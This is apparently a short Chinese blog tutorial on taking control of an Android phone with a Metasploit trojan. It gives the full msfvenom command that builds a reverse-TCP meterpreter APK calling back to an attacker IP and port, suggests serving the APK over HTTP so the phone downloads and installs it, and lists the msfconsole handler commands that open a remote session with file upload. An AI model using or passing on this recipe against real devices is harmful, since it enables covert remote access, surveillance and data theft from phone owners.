msf使用木马控制android手机

msf使用木马控制android手机

环境:

kali、手机模拟器(或不用的手机)。

要求

手机模拟器(或者手机)与电脑可以互相连通吗,即手机可以直接访问到kali。

步骤

1、制作木马。

命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.32.135 lport=4444 > android_shell.apk
msf使用木马控制android手机_第1张图片

2、手机安装木马。
想办法把木马放到手机模拟器(或者手机)里。
例如:kali开启http服务,然后手机链接、下载、安装。
msf使用木马控制android手机_第2张图片
msf使用木马控制android手机_第3张图片

3、kali开启监听。

这里要注意的是,此处的参数要与制作木马时的参数保持一致。

msfconsole			//开启msf
use exploit/multi/handler			//选择监听模块
set lhost 192.168.32.135			//设置参数监听段的ip(kali的ip)
set lport 4444						//设置参数监听使用的端口(kali的端口)
set payload android/meterpreter/reverse_tcp			//设置payload。(这一个必须设置)
run									//开始监听

msf使用木马控制android手机_第4张图片
msf使用木马控制android手机_第5张图片

4、成功,开启控制台。
输入?后下面显示的都是可用的命令。
msf使用木马控制android手机_第6张图片

例如文件上传:

msf使用木马控制android手机_第7张图片
在这里插入图片描述

你可能感兴趣的:(渗透测试,android,msf,msfconsole,木马,渗透)